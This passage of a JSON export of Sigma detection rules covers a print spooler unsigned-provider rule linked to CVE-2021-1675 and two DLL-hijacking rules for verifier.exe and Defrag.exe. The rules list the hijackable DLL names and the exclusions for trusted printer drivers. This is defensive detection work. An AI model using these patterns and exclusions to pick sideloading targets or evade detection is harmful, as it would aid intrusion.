'?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\???EU.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\???EUC.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\cmprecnt.DLL'\n Company: 'SHARP CORPORATION'\n exclusion_pdflib:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\pdflib.dll'\n Company: 'PDFlib GmbH'\n OriginalFileName: 'pdflib.dll'\n exclusion_pdfwrt:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PDFWrtDrv.dll'\n OriginalFileName: 'PDFWrtDrv.DLL'\n InternalName: 'PDFWrtDrv'\n exclusion_nspdf:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\NsPdfMdl.dll'\n OriginalFileName: 'NsPdfMdl.DLL'\n InternalName: 'NsPdfMdl'\n exclusion_newsoft:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\Ism64.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\NSUNI.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\Fioall64.dll'\n Company:\n - 'NewSoft Technology Corporation'\n - 'Newsoft'\n - 'newsoftinc'\n OriginalFileName:\n - 'Ism.DLL'\n - 'NSUNI.DLL'\n - 'Fioall32.dll'\n exclusion_newsoft_missing_pe_info:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\NSUI.dll'\n Company: ''\n OriginalFileName: ''\n InternalName: ''\n exclusion_nuance:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\znsprn*.fra' # (znsprnuires.fra)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\znsprn*.dll' # (znsprnui.dll, znsprngraf.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\znsprn*.ENU' # (znsprnuires.ENU)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\NuanUI.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\NuanOemUiRes.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\UiSupportRes.ENU'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\UiSupport.dll'\n Company:\n - 'Nuance Communications, Inc.'\n - 'Zeon Corp.'\n - 'Zeon Corporation.'\n exclusion_pxcuif:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PXC???.DLL' # PXC30f.DLL\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PXC?????.DLL' # PXC30UIa.DLL\n Company:\n - 'Tracker Software Products Ltd.'\n - 'Tracker Software'\n OriginalFileName:\n - 'PXC??.DLL'\n - 'PXC????.dll'\n exclusion_pxcuif_empty:\n # We must use size: '-1'\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PXC?????.DLL' # PXC40UIf.DLL\n Company: ''\n Product: ''\n OriginalFileName: ''\n InternalName: ''\n\n exclusion_lexmark1:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\??AC??4Z.DLL' # DKACHC4Z.DLL / LMACIL4Z.DLL\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\LMA???4Z.DLL' # LMABJ74Z.DLL / LMAATC4Z.DLL\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\LMUD064Z.DLL'\n Company:\n - 'Lexmark International, Inc.'\n - 'Microsoft Corp.'\n OriginalFileName: 'PSUIREP.dll'\n\n exclusion_lexmark2:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\lm??????.dll' # lmzarl32.dll, lmzadcmn.dll, lmzpmc3.dll, lmlznie1.dll, lmxgbzim.dll, ...\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\lm?????.dll' # lmzpmc3.dll\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\lm????.xrs' # lmxgbz.xrs\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\lm??????.xrs' # lmxgbzir.xrs\n Company:\n - 'Lexmark International, Inc.'\n - 'Lexmark International, Inc'\n - 'Lexmark International Inc.'\n - 'Lexmark'\n # Product: 'Lexmark Printer Driver' # sometimes empty...\n\n exclusion_lexmark_pcl:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\LMAD????.DLL' # LMADUP40 / LMADUP4A / LMADUP4C / LMAD0PUH.DLL / LMAD0PUE.DLL / LMAD0PUD.DLL / LMAD2N4Z.DLL / ...\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\LMUD1???.DLL' # LMUD1P40 / LMUD1PUE / LMUD1OUH.DLL / LMUD1O4Z.DLL / ...\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\LMU03???.DLL' # LMU03PBJ.DLL / LMU03PTD.DLL / LMU03PUA.DLL\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\TSUD????.DLL' # TSUD1OBJ.DLL / TSUD1OUH.DLL / TSUD1OUB.DLL\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\LMUE????.DLL'\n #Company|contains: 'Lexmark' # sometimes no company name...\n\n exclusion_ms_pcl:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PCLXL.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PCL5ERES.DLL'\n Company: 'Microsoft Corporation'\n\n exclusion_fxsdrv:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\FXS??.DLL' # (FXSUI.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\FXS???.DLL' # (FXSDRV.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\FXS????.DLL' # (FXSWZRD.DLL, FXSTIFF.DLL)\n Company: 'Microsoft Corporation'\n OriginalFileName:\n - 'FXS??.DLL'\n - 'FXS???.DLL'\n - 'FXS????.DLL'\n exclusion_fxsdrv_without_infos:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\FXS??.DLL' # (FXSUI.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\FXS???.DLL' # (FXSDRV.DLL, FXSAPI.DLL, FXSRES.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\FXS????.DLL' # (FXSWZRD.DLL)\n Company: ''\n Description: ''\n OriginalFileName: ''\n InternalName: ''\n\n exclusion_panasonic:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\D0GDGC2K.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\K0J*.DLL'\n Company:\n - 'Panasonic Communications Co., Ltd.'\n - 'Panasonic System Networks Co., Ltd.'\n\n exclusion_toshiba:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\eS*.dll' # eS4pCDTP.dll / eS4pPrc.dll / eSm166bd.dll / eSm166rd.dll / eSPx6XL.DLL / eSPx6UI.DLL / eSh6ufwdsdk.dll / eSf6uui.dll / eSf6uw/dll / eSf6ufwdsdk.dll / eSf6usf_builtin.dll / ...\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\eB2*.dll' # eB2oPrc.dll / eB2oCDTP.dll / eB2ox6ui.dll\n Company:\n - 'TOSHIBA TEC CORPORATION'\n - 'Monotype Imaging, Inc.'\n - 'Monotype Imaging Inc.'\n\n exclusion_toshiba_2:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\eSm6ssnm.dll'\n OriginalFileName: 'eSTsnmp.dll'\n InternalName: 'eSTsnmp'\n\n exclusion_xps:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\XPSSVCS.DLL'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'xpssvcs.dll'\n\n exclusion_ttyui:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\TTY.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\TTYUI.DLL'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'tty.dll'\n\n exclusion_ttyres:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\TTYRES.DLL'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'Ttyres.dll'\n\n exclusion_rpcsui:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RPCSUI.DLL'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'RPCSUI.DLL'\n\n exclusion_marvell1:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\HP??????.DLL' # (HP2030PP.DLL, HP2030GC.dll, HP2030SU.DLL, ... )\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\??hp1020.dll' # (suhp1020.dll, sdhp1020.dll, GChp1020.dll)\n Description:\n - 'Marvell Printer Software Driver'\n - 'HP Printer Software Driver'\n\n exclusion_marvell2:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\HP????????.DLL' # (HPCP1020SD.DLL)\n Company: 'Marvell Semiconductor, Inc.'\n\n exclusion_electronics:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\EF??????.dll' # (EF691626.dll, EF997948.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\harmony*.dll' # (harmony_efi_color.dll, harmony_efi.dll, harmony_ctp.dll, harmony_core.dll, harmony10.dll, ...)\n Company: 'Electronics For Imaging, Inc.'\n\n exclusion_missing_pe_info:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\EF??????.dll' # (EF539658.dll)\n Company: ''\n Product: ''\n OriginalFileName: ''\n InternalName: ''\n\n exclusion_zeon:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\UiSupport.dll'\n Company: 'Zeon Corporation.'\n\n exclusion_datacard:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\dxp01UI.dll'\n Company: 'DataCard Corporation'\n\n exclusion_msvcr80_signed:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\msvc?80.dll' # (msvcr80.dll, msvcp80.dll)\n Company: 'Microsoft Corporation'\n OriginalFileName: 'MSVC?80.DLL'\n\n exclusion_vnc:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\VNCui.dll'\n Description: 'Driver UI DLL'\n Product: 'VNC Printer'\n\n exclusion_sendtoonenote_infos:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\SendToOneNoteUI.dll'\n Company: ''\n Description: ''\n OriginalFileName: ''\n InternalName: ''\n\n exclusion_dell:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\DLPSLALU-1.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\dl*xpUI.DLL' # dltfm1zxpUI.DLL, dlthm1zxpui.dll\n Description:\n - 'Dell Printer Driver'\n - 'Dell FAX Printer Driver'\n Product:\n - 'Dell Printer Driver'\n - 'Dell * Multifunction Printer' # Dell C1765 Color Multifunction Printer\n\n exclusion_eptintblock:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\EPOBW9SC.DLL'\n Description: 'EPTintBlock_dll'\n OriginalFileName: 'EPTintBlock.dll'\n\n exclusion_mom:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\MomUdUi*.dll' # (MomUdUI.DLL, MomUdUiPS.dll, MomUdUIPclXl.dll)\n Description: 'MOM Universal Driver UI'\n OriginalFileName: 'MomUdUi.dll'\n\n exclusion_zenographics:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ZTAG.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ZGDI.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ZSPOOL.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ZSDDM.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ZJBIG.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ZSDDMUI.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\zSDNT5UI.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\suhp2600.dll'\n Company:\n - 'Zs, Inc.'\n - 'Zenographics, Inc.'\n Product:\n - 'Zenographics ZTag'\n - 'SuperPrint'\n - 'hp LaserJet 2600 series'\n\n exclusion_semiconductor:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ZSUXML.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ZSDm1120.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\GChp2600.dll'\n Company: 'Marvell Semiconductor, Inc.'\n Product:\n - 'SuperPrint'\n - 'Falcon'\n - 'Marvell Semiconductor SuperPrint'\n\n exclusion_xerces:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\XERCES-C.DLL'\n Company: 'Apache Software Foundation'\n Description: 'Shared Library for Xerces-C Version *' # (Shared Library for Xerces-C Version 1.7.0)\n OriginalFileName: 'xerces-c_*.dll' # (xerces-c_1_7_0.dll)\n\n exclusion_riso:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RC*.DLL' # RC30U.DLL / RC30C.DLL / RC30L.DLL / RC20C.DLL\n Company: 'RISO KAGAKU CORPORATION'\n Description: 'RISO KAGAKU CORPORATION : *'\n OriginalFileName: 'RC???.DLL' # RC30U.DLL / RC30C.DLL / RC30L.DLL\n\n exclusion_riso_without_infos:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\Risopcfg2.dll'\n Company: ''\n Description: ''\n OriginalFileName: ''\n InternalName: ''\n\n exclusion_uiplugin:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xp3250u.dll'\n Company: ''\n Description: 'UI Plug-In DLL'\n OriginalFileName: ''\n Product: 'UI Plug-In DLL'\n\n exclusion_openssl1:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xlibeay????.dll' # (xlibeay101j.dll)\n Company: 'The OpenSSL Project, http://www.openssl.org/'\n Description: 'OpenSSL Shared Library'\n OriginalFileName: 'libeay32.dll'\n InternalName: 'libeay32'\n\n exclusion_openssl2:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\x3encr8K.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\libcrypto-*-x64.dll' # (libcrypto-1_1-x64.dll)\n Company:\n - 'The OpenSSL Project, http://www.openssl.org/'\n - 'The OpenSSL Project, https://www.openssl.org/'\n Description: 'OpenSSL library'\n OriginalFileName: 'libcrypto'\n InternalName: 'libcrypto'\n\n exclusion_pdfui:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\pdfui64.dll' # (xlibeay101j.dll)\n InternalName: 'PDF Printer User Interface DLL'\n Product: 'PDF4U Adobe PDF Creator'\n\n exclusion_foxit:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\fpmvpr_drv.dll'\n Company: 'Foxit Corporation'\n Description: 'Foxit PhantomPDF Printer: Virtual Printer Driver'\n\n exclusion_oce:\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ocewpdSUI.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ocewpdpui.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ocewpdMUI.DLL\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ocewpd?UI.DLL'\n Company: 'Océ-Technologies B.V.'\n Product:\n - 'Océ WPD'\n - 'Océ Publisher Printlet'\n\n exclusion_granite:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ONGui.dll'\n Company: 'Monotype Imaging Inc.'\n Product: 'Granite Printer Driver GUI for Windows'\n\n exclusion_polyergic:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\kuwpd*.dll' # (kuwpdui.dll, kuwpdgdi.dll, kuwpdglx.dll)\n Company:\n - 'Polyergic Consulting'\n - 'Polyergic Consulting for KIP America'\n Product:\n - 'IPS Unified Printer Driver'\n - 'KUWPD'\n\n exclusion_tskui:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\TSKUI.DLL'\n Company: 'Monotype Imaging Inc.'\n OriginalFileName: 'GSUI.DLL'\n\n exclusion_csjcxui:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\CSJCXUI.DLL'\n Company: ''\n OriginalFileName: 'CSJCXUI'\n\n exclusion_mimosaweb:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\HF2XLFRFR.dll'\n Company: 'OEM'\n OriginalFileName: 'FRFR.DLL'\n\n exclusion_seagull:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\??#???-u.d64' # (tt#tec-u.d64, in#ipl-u.d64)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\??#???-?.dll' # (in#epl-e.d64)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\Seagull_V3_*Dispatcher.dll' # (Seagull_V3_PrintDispatcher.dll, Seagull_V3_ConfigDispatcher.dll)\n Company: 'Seagull Scientific, Inc.'\n\n exclusion_webex:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\wdlres.dll'\n Company: 'Cisco WebEx LLC'\n OriginalFileName: 'wdlres.dll'\n\n exclusion_citizen:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\cbm*.dll' # (cbm16.dll, cbmuni16.dll)\n Company: 'CITIZEN SYSTEMS JAPAN'\n\n exclusion_pdfbean:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\pdf4u64.dll'\n Company: 'PDF Bean Inc.'\n OriginalFileName: 'pdf4u64.dll'\n\n exclusion_dp:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\DPD??????.DLL' # (DPDS620RN.DLL, DPDS620RES.DLL)\n Description: 'DP-DS??? Printer Driver'\n\n exclusion_hp_distributed_by_ms:\n # https://www.virustotal.com/gui/file/71ce3bac24abc2b965158d186a93e0ac52cf89be23f7ae20b6b1c6c0162a18c6\n # https://www.virustotal.com/gui/file/48cfbfb5ac53c137baaea336e31f29e9d438f4c3eb12088fb156fb13a849e820\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\HPBPRO.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\HPBMINI.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\HPZINW12.DLL'\n Company: ''\n Description: ''\n OriginalFileName: ''\n InternalName: ''\n\n exclusion_unknowns:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\EAPuir0e.DLL' # 8527c74d8b62ec58a2db3cbf0ebf929caeee4454854a2036ca36271451666cf9\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\BRUIF13A.DLL' # 36002d2d7b9d42d0c3bcd929d607ca16a7d491c5b0f9e5892028cf5f4d588d3b\n\n exclusion_sha256:\n sha256:\n - 'b43d2bd4d16172048e6b493e051957441c558b5ad893c9fbe27f9834fea16afc'\n - '24c9544f5c00e0662e52ade8e997169aa51ee5f7a8e447701dec98d6ebe67563'\n - '7b67db0afa25c0bc31551e60de06ef0badc00e3b5ff64a96d8b3950e69a05b77'\n - 'b7c013d662ce67aa0905c09ced8599f0a6e962f475bf3cf75eb55ea182ba76e0'\n\n exclusion_fujitsu:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\FIP*.DLL' # (FIPVEN.DLL, FIPVCMND.DLL, FIPV.DLL, FIPVUI.DLL)\n Company: 'Fujitsu Isotec Limited'\n Description: 'FIT Thermal Printer Driver'\n\n exclusion_xprinter:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\POS80.DLL'\n Company: 'XINYE'\n Description: 'XP Thermal Printer Driver'\n\n exclusion_csprt:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\csprt.dll'\n OriginalFileName: 'CSPRT.DLL'\n Description: 'Cassette/Slide Printer UI'\n\n exclusion_zan:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\zvprt*5.dll' # (zvprtuni5.dll, zvprtui5.dll)\n OriginalFileName: 'zvprt*'\n Description: 'zvprt*'\n\n exclusion_microsoft_without_infos:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ASKOKI01.DLL'\n Company: ''\n Description: ''\n OriginalFileName: ''\n InternalName: ''\n\n exclusion_known_companies:\n Company:\n - 'BIXOLON Co.,Ltd.'\n - 'CITIZEN SYSTEMS JAPAN'\n - 'SEIKO EPSON CORPORATION'\n - 'RISO KAGAKU CORPORATION.'\n - 'Windows (R) Codename Longhorn DDK provider'\n - 'BIXOLON Co., Ltd.'\n - 'DYMO Corp.'\n - 'Brady Corporation'\n - 'EPSON'\n - 'Flex Systems B.V.'\n - 'CANON INC.'\n - 'SHARP'\n - 'VIPColor'\n - '\"Seagull Scientific, LLC.\"'\n - 'GRAVOTECH'\n - 'Polyergic Consulting'\n - 'Trotec Laser GmbH'\n - 'Cembre S.p.A.'\n - 'Fujitsu Isotect Limited'\n - 'May Software'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f5a0d71f-1a1b-430d-bdc6-2c661c63b6f9",
"rule_name": "Spoolsv Unsigned Print Provider Added",
"rule_description": "Detects spoolsv loading an unsigned print provider, potentially indicating CVE-2021-1675 exploitation.\nSpoofsv is the print spooler service, and loading unsigned print providers can be used by attackers to exploit vulnerabilities.\nIt is recommended to restart the print spooler service, review print provider installations, and check for any signs of unauthorized code execution or file modifications associated with this activity.\n",
"rule_creation_date": "2021-07-01",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1574"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f5bcc588-5876-4367-bd97-d6c7914e8009",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096299Z",
"creation_date": "2026-03-23T11:45:34.096301Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096305Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_verifier.yml",
"content": "title: DLL Hijacking via verifier.exe\nid: f5bcc588-5876-4367-bd97-d6c7914e8009\ndescription: |\n Detects potential Windows DLL Hijacking via verifier.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'verifier.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\davclnt.dll'\n - '\\drprov.dll'\n - '\\ntlanman.dll'\n - '\\p9np.dll'\n - '\\propsys.dll'\n - '\\windows.storage.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f5bcc588-5876-4367-bd97-d6c7914e8009",
"rule_name": "DLL Hijacking via verifier.exe",
"rule_description": "Detects potential Windows DLL Hijacking via verifier.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f5e3e1e8-5937-4413-a606-893a66c8dbdc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097262Z",
"creation_date": "2026-03-23T11:45:34.097264Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097269Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_defrag.yml",
"content": "title: DLL Hijacking via Defrag.exe\nid: f5e3e1e8-5937-4413-a606-893a66c8dbdc\ndescription: |\n Detects potential Windows DLL Hijacking via Defrag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Defrag.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\sxshared.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: 